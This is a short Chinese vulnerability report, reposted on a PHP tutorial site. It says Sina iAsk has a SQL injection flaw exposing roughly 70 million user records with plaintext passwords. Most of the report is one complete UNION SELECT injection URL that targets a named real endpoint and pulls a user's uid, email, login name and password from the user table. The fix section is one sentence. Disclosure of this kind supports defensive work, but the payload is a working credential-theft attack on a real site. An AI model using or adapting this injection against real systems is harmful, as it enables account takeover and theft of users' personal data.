来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 详细说明:新浪爱问存在sql注射漏洞,可以查询爱问会员库中用户名与密码(明文),数据库内大概纪录7000w条用户信息。http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+UNION+ALL+SELEC...
|
详细说明:新浪爱问存在sql注射漏洞,可以查询爱问会员库中用户名与密码(明文),数据库内大概纪录7000w条用户信息。
http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+UNION+ALL+SELECT+%28SELECT+concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,0x245e%29+FROM+%60whatis%60.user+where+uid=12715428867+LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11-- 漏洞证明:    修复方案:注射只是问题表面,更深层次的问题在于会员库存储机制的改进 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
